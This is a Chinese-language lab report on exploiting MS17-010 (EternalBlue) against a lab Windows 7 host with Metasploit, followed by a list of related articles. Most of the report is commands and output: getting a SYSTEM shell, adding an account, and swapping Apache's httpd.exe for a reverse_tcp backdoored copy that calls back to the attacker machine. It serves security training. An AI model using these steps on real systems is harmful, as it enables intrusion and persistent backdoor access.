利用永恒之蓝渗透WIN7
实验名称:利用永恒之蓝渗透win7
实验人:xx
实验日期:2021.9.24
实验目的:通过已知漏洞攻击目标服务器并拿到shell
实验环境:
kali:172.16.12.30
win7靶机:172.16.12.4 用户名:administrator 密码:vgrant
实验步骤:
配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled
查看MS17-010相关模块,并使用序号3扫描模块扫描目标及
msf6 > search ms17-010
msf6 > use 3
查看模块参数并设置目标机IP,执行扫描,未发现相关漏洞
msf6 auxiliary(admin/smb/ms17_010_command) > show options
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(admin/smb/ms17_010_command) > run
换序号4模块进行扫描,设置目标主机,执行扫描,发现漏洞
msf6 > search ms17-010
msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
查找攻击模块,并使用
msf6 > search ms17-010
msf6 > use 0
查看设置模块,并设置目标主机ip,执行run
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
渗透成功
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd C:\Windows\system32
对目标及实施攻击
截取屏幕
创建账户
meterpreter > shell #进入目标机shell
C:\Windows\system32>net user #查看当前账户
创建账户cuiyi
C:\Windows\system32>net user cuiyi /add
创建后门
meterpreter > ps -S httpd.exe
meterpreter > kill 3212 #先杀死进程才能下载,下载后调到后台
meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
制作后门文件
msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p windows -x /root/desktop/httpd.exe -k -f exe -o /root/httpd_door.exe
[*] Writing 29184 bytes to /root/httpd_door.exe...
启动监听,监听后门的反向连接,并用run -j到到后台
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.12.30:4444
切回之前保存后台的会话,上传后门文件并重命名
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 172.16.12.30:4444 -> 172.16.12.4:49609 (172.16.12.4)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > pwd
c:\wamp\bin\apache\apache2.2.21\bin
meterpreter > mv httpd.exe httpd.exe.bak
meterpreter > upload /root/httpd_door.exe
[*] uploading : /root/httpd_door.exe -> httpd_door.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd_door.exe -> httpd_door.exe
[*] uploaded : /root/httpd_door.exe -> httpd_door.exe
meterpreter > mv httpd_door.exe httpd.exe
重启wampapache服务,服务器启动后,返回了新的会话(最后一行)
exploit/multi/handler 保持监听状态,每当对端的“httpd.exe” 重启,这边就会启动会话
重启wampapache
返回kaili看到成功建立连接
利用永恒之蓝渗透WIN7相关推荐
- MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)
任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令"msfconsole ",启动Metasploit:输入命令"use auxiliary/scanner/ ...
- [网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集.CMS漏洞搜索.D ...
- MSF利用永恒之蓝渗透win2003
1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...
- 经典利用永恒之蓝漏洞对Windows操作系统进行攻击
利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...
- 利用永恒之蓝漏洞+修复方法(MS17-010)
文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...
- Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...
- MSF之利用永恒之蓝
永恒之蓝: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚至于2017年5月12日, ...
- 记一次MSF永恒之蓝入侵win7系统实验
目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目 ...
- 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)
一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...
最新文章
- .pgr照片文件解析,C++与Java存储数据差别大小端模式
- 【NLP】 聊聊NLP中的attention机制
- Tensorflow Python3 做神经网络(视频教程)
- ClassLoader类解析
- 微型计算机的构成部件6,谈谈微机的主要部件与指标
- C# winform中使窗体最小化(NotifyIcon)
- java月利率计算(等额本息贷款)
- 彻底解决SysFader:IEXPLORE.EXE应用程序错误
- glibc-2.23-free
- php微信绑定银行卡_微信开发企业支付到银行卡PHP
- Android项目的targetSDK=23,在低于Android6.0的部分测试机(类似华为)上运行时出现的系统权限问题...
- 我国有关信息方面的法律法规
- wrf模式计算机配置,用WRF模型进行气象模拟入门(2)——WPS的配置与使用
- 漫画电子电路读书笔记
- android开发 dts、各种接口porting
- [2021ICLR]Improve Object Detection with Feature-based Knowledge Distillation 论文笔记
- w32tm 排错时间
- 【数学】三角形内接平行四边形问题
- UE4动画 高级运动系统 AdvancedLocomotionSystemV 解析
- 抖音轮播图html代码,抖音上超火的“图片轮播”、“卡点”视频都是怎么做的?...